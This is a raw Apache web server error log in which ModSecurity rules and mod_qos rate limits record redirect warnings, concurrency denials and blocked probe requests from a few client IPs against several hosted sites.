[Tue May 26 20:00:24.304567 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB4AAAACM"]
[Tue May 26 20:00:24.305811 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1egQAAAOI"]
[Tue May 26 20:00:24.312053 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB6gAAAHk"]
[Tue May 26 20:00:24.314808 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ehwAAALk"]
[Tue May 26 20:00:24.318776 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB6wAAACc"]
[Tue May 26 20:00:24.323735 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1egAAAAKY"]
[Tue May 26 20:00:24.323864 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ehQAAAIU"]
[Tue May 26 20:00:24.330435 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ejwAAALg"]
[Tue May 26 20:00:24.331986 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB_AAAAFc"]
[Tue May 26 20:00:24.338998 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB9wAAAAs"]
[Tue May 26 20:00:24.339871 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB5QAAAD4"]
[Tue May 26 20:00:24.344874 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB-gAAAAo"]
[Tue May 26 20:00:24.348010 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eegAAALU"]
[Tue May 26 20:00:24.349154 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB-AAAABQ"]
[Tue May 26 20:00:24.354290 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCJQAAABI"]
[Tue May 26 20:00:24.365944 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ekAAAALM"]
[Tue May 26 20:00:24.366229 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ebwAAAPQ"]
[Tue May 26 20:00:24.375333 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB-QAAAAw"]
[Tue May 26 20:00:24.405894 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e0gAAAK0"]
[Tue May 26 20:00:24.411346 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuf4ZZc2DoU1lPnP1etQAAAIg"]
[Tue May 26 20:00:24.428395 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e5AAAANQ"]
[Tue May 26 20:00:24.431320 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e1QAAAOs"]
[Tue May 26 20:00:24.436129 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCOAAAAEc"]
[Tue May 26 20:00:24.437684 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e4QAAAL8"]
[Tue May 26 20:00:24.437955 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCNgAAAC8"]
[Tue May 26 20:00:24.439895 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e3QAAAL0"]
[Tue May 26 20:00:24.445563 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e2AAAANs"]
[Tue May 26 20:00:24.449174 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCPAAAACg"]
[Tue May 26 20:00:24.453670 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e3gAAAJk"]
[Tue May 26 20:00:24.458306 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCSQAAACY"]
[Tue May 26 20:00:24.459927 2026] [security2:error] [pid 93576:tid 93824] [client 103.163.220.44:50295] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/"] [unique_id "ahWugGDRMqfxdEDkoswCeQAAAHA"]
[Tue May 26 20:00:24.577276 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCqgAAABw
[Tue May 26 20:00:24.583704 2026] [qos:error] [pid 106517:tid 106746] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fLQAAAOQ
[Tue May 26 20:00:24.586786 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fLgAAANU
[Tue May 26 20:00:24.586882 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCqwAAABk
[Tue May 26 20:00:24.590273 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCrAAAAG0
[Tue May 26 20:00:24.596197 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCrQAAAC0
[Tue May 26 20:00:24.604434 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fLwAAAM8
[Tue May 26 20:00:24.604517 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCrgAAAGw
[Tue May 26 20:00:24.623114 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCrwAAAGM
[Tue May 26 20:00:24.632905 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCsgAAAHU
[Tue May 26 20:00:24.692785 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fMQAA3mo"]
[Tue May 26 20:00:24.725101 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCtgAAAAo
[Tue May 26 20:00:24.734052 2026] [qos:error] [pid 106517:tid 106734] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fMwAAANg
[Tue May 26 20:00:24.734201 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fMgAAAK0
[Tue May 26 20:00:24.735211 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCtwAAADY
[Tue May 26 20:00:24.737994 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCuAAAAEQ
[Tue May 26 20:00:24.743962 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCuQAAABw
[Tue May 26 20:00:24.752162 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fNAAAAOk
[Tue May 26 20:00:24.756889 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCugAAABk
[Tue May 26 20:00:24.782443 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCwQAAAHU
[Tue May 26 20:00:24.782516 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCwgAAACw
[Tue May 26 20:00:24.935406 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCwwAAABY
[Tue May 26 20:00:24.937720 2026] [qos:error] [pid 106517:tid 106769] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fPwAAAPs
[Tue May 26 20:00:24.937735 2026] [qos:error] [pid 106517:tid 106753] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fPgAAAOs
[Tue May 26 20:00:24.940008 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCxAAAADY
[Tue May 26 20:00:24.940830 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCxQAAAAo
[Tue May 26 20:00:24.941156 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCxwAAABw
[Tue May 26 20:00:24.942356 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCyAAAABk
[Tue May 26 20:00:24.942383 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCxgAAAEQ
[Tue May 26 20:00:24.943677 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fQAAAAIc
[Tue May 26 20:00:24.946255 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCyQAAAGM
[Tue May 26 20:00:24.986144 2026] [security2:error] [pid 106517:tid 106711] [client 103.163.220.19:61375] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ioxi-o.php"] [unique_id "ahWugIZZc2DoU1lPnP1fQQAAAME"]
[Tue May 26 20:00:25.216426 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fUAAAuR8"], referer: https://www.ndequipments.com/config.js
[Tue May 26 20:00:25.257397 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswCywAAAE8
[Tue May 26 20:00:25.259222 2026] [qos:error] [pid 106517:tid 106754] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fUwAAAOw
[Tue May 26 20:00:25.263383 2026] [qos:error] [pid 106517:tid 106771] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fVQAAAP0
[Tue May 26 20:00:25.264573 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswCzAAAAEM
[Tue May 26 20:00:25.265175 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswCzQAAABU
[Tue May 26 20:00:25.265396 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswCzgAAAFw
[Tue May 26 20:00:25.267364 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fVgAAALQ
[Tue May 26 20:00:25.268549 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswCzwAAAGk
[Tue May 26 20:00:25.275422 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e3AAAAJs"]
[Tue May 26 20:00:25.277017 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e1gAAAJc"]
[Tue May 26 20:00:25.281357 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e6AAAAPw"]
[Tue May 26 20:00:25.293304 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCSwAAAAQ"]
[Tue May 26 20:00:25.303316 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCQwAAADw"]
[Tue May 26 20:00:25.303725 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCSAAAAG8"]
[Tue May 26 20:00:25.309730 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCRwAAAAE"]
[Tue May 26 20:00:25.314254 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e6QAAAN0"]
[Tue May 26 20:00:25.323871 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCRQAAAFQ"]
[Tue May 26 20:00:25.326688 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCRgAAAHs"]
[Tue May 26 20:00:25.335390 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e6wAAAOA"]
[Tue May 26 20:00:25.336653 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCTAAAADM"]
[Tue May 26 20:00:25.350712 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fEAAAAMU"]
[Tue May 26 20:00:25.354276 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e5gAAAJQ"]
